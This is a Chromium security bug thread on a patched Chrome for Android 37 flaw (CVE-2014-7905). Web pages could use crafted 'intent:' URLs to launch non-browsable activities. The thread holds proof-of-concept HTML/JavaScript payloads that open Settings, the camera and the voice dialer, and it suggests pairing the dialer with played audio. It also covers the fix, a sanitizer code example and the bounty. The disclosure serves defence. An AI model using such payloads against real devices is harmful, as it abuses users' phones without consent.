Status: Fixed
Owner:
Last visit > 30 days ago
Closed: Oct 2014
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security
Security: handleAuthenticatorUrl to launch any activity from web page
Reported by win...@gmail.com, Oct 9 2014 Back to list
VULNERABILITY DETAILS
handleAuthenticatorUrl in com.google.android.apps.chrome.tab.AuthenticatorHelper
can launch unintended activities (those without the BROWSABLE category) on the phone.

VERSION
Chrome Version: Chrome for Android 37.0.2062.117
Operating System: Android 4.4.2

REPRODUCTION CASE

Opening the following HTML in Chrome will start the Settings application in Android:

<body>
<script>
var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;SEL;component=com.android.settings/.Settings;end";
location.href = url;
</script>
</body>

Another example URL, to launch the camera application:
var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;SEL;component=com.android.camera2/com.android.camera.CameraActivity;end";
Cc: mkosiba@chromium.org benm@chromium.org candr...@chromium.org palmer@chromium.org
Labels: OS-Android Security_Severity-High Security_Impact-Stable Cr-Mobile-Intents
Status: Available
Thanks for the report.

Adding some ccs from bug 370399. Does anyone know who a good owner for this might be?
Cc: jaekyun@chromium.org
+CC jaekyun@ who's currently working in that area. Jaekyun, you want to take this on?
FTR: since the code in handleAuthenticatorUrl looks like it's copy-pasted from UrlHandler it should be easy to port the fixes from 370399.
Project Member Comment 4 by clusterf...@chromium.org, Oct 9 2014
Labels: M-38 Pri-1
Owner: jaekyun@chromium.org
I will take a look at this issue.
I've uploaded https://chrome-internal-review.googlesource.com/#/c/179039 to fix this issue.

Project Member Comment 7 by bugdroid1@chromium.org, Oct 10 2014
The following change refers to this bug:
https://chrome-internal-review.googlesource.com/179039
Labels: Merge-Requested
Status: Started
Labels: -Merge-Requested
My change was reverted because it caused a lint error.

So I've uploaded https://chrome-internal-review.googlesource.com/#/c/179246/ after fixing the lint error.

Labels: Merge-Requested
The change has landed successfully.
BTW, isn't M38 already released? Maybe we only need to merge the patch into M39 because this isn't any regression.
Labels: -M-38 M-39
38 has been released, per comment 11, punting to 39. 
Labels: -Merge-Requested Merge-Approved
merge approved for m39 branch 2171
Cc: kkimlabs@chromium.org
Labels: -Merge-Approved Merge-Merged
Status: Fixed
https://chrome-internal-review.googlesource.com/#/c/179331/ has just been merged to m39.
Project Member Comment 16 by clusterf...@chromium.org, Oct 14 2014
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Comment 17 by win...@gmail.com, Oct 16 2014
Note that an explicit intent can also be used here (instead of using a selector) to bypass the security check.
An interesting exploit would be to start a voice dialer while playing a voice command with Web Audio API.

var url = "intent:#Intent;action=com.google.android.apps.authenticator.AUTHENTICATE;component=com.android.voicedialer/.VoiceDialerActivity;end";

See attachment: test3.html (2.0 KB)
My patch covers that explicit intent as well because it resets component information of both an intent and a selector in an intent.
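The fix described in the comment above (clearing the component of both the intent and its selector, and requiring the BROWSABLE category) can be illustrated with the following sanitizer for "intent:" URLs received from web content. This is an added example written for this page, not Chromium's patch (the actual change is on an internal review and is not reproduced here); the class name WebIntentSanitizer and the URI-permission flag stripping are assumptions of the example.

```java
import android.content.Intent;
import java.net.URISyntaxException;

/**
 * Illustrative hardening for a handler that turns an "intent:" URL coming from
 * web content into an Intent. Added example; the class and method names are
 * assumed and do not correspond to Chromium's AuthenticatorHelper.
 */
public final class WebIntentSanitizer {

    private WebIntentSanitizer() {}

    /**
     * Parses an intent: URL and strips everything that would let the page pick
     * the target component directly. Returns null when the URL cannot be parsed.
     */
    public static Intent sanitize(String intentUrl) {
        Intent intent;
        try {
            intent = Intent.parseUri(intentUrl, Intent.URI_INTENT_SCHEME);
        } catch (URISyntaxException e) {
            return null;
        }

        // 1. Explicit target ("component=" on the intent itself): drop it so the
        //    intent has to resolve through activities' declared intent filters.
        intent.setComponent(null);

        // 2. Selector ("SEL;component=" in the report): a selector carries its own
        //    component and categories, so it must be cleaned the same way.
        Intent selector = intent.getSelector();
        if (selector != null) {
            selector.setComponent(null);
            selector.addCategory(Intent.CATEGORY_BROWSABLE);
        }

        // 3. Only activities that opted in to being launched from web content
        //    (those whose filter declares BROWSABLE) may resolve this intent.
        intent.addCategory(Intent.CATEGORY_BROWSABLE);

        // 4. Assumed extra hardening, not from this report: web content must not be
        //    able to grant itself URI permissions on content providers.
        int grantFlags = Intent.FLAG_GRANT_READ_URI_PERMISSION
                | Intent.FLAG_GRANT_WRITE_URI_PERMISSION;
        intent.setFlags(intent.getFlags() & ~grantFlags);

        return intent;
    }
}
```

Steps 1 and 2 together are what makes both of the reporter's variants harmless: the selector-based URL from the original report loses its selector component, and the explicit-intent variant from comment 17 loses its top-level component. Step 3 ensures that even after those are cleared, resolution can only reach an activity whose intent filter explicitly declares BROWSABLE, which is the contract non-browsable activities such as Settings, the camera and the voice dialer rely on.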

Labels: Release-0-M39
Labels: reward-topanel
Comment 21 by win...@gmail.com, Nov 13 2014
Chrome 39 for Android is out; when will this issue get a CVE identifier?
What is a CVE identifier?
Comment 23 by win...@gmail.com, Nov 13 2014
please see https://cve.mitre.org/cve/identifiers/
for example, in the following release notes, a CVE identifier (CVE-2014-3201) is assigned:
http://googlechromereleases.blogspot.com/2014/10/chrome-for-android-update.html
Grace, whom should I contact in Chrome team to get a CVE identifier for this issue?

When Chrome 39 is released, I'll update this with the CVE.
Labels: -reward-topanel reward-unpaid reward-2000 CVE-2014-7905
Thanks for the report! This one qualified for a $2000 reward.
Comment 27 by win...@gmail.com, Nov 17 2014
Thanks a lot, you are so kind! if possible, please credit me as "WangTao(neobyte) of Baidu X-Team". 
Labels: -reward-unpaid reward-inprogress
Reward payment in progress.
Labels: -reward-inprogress reward-inprocess
Project Member Comment 30 by clusterf...@chromium.org, Jan 19 2015
Labels: -Restrict-View-SecurityNotify
Bulk update: removing view restriction from closed bugs.
Cc: -kkimlabs@chromium.org
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic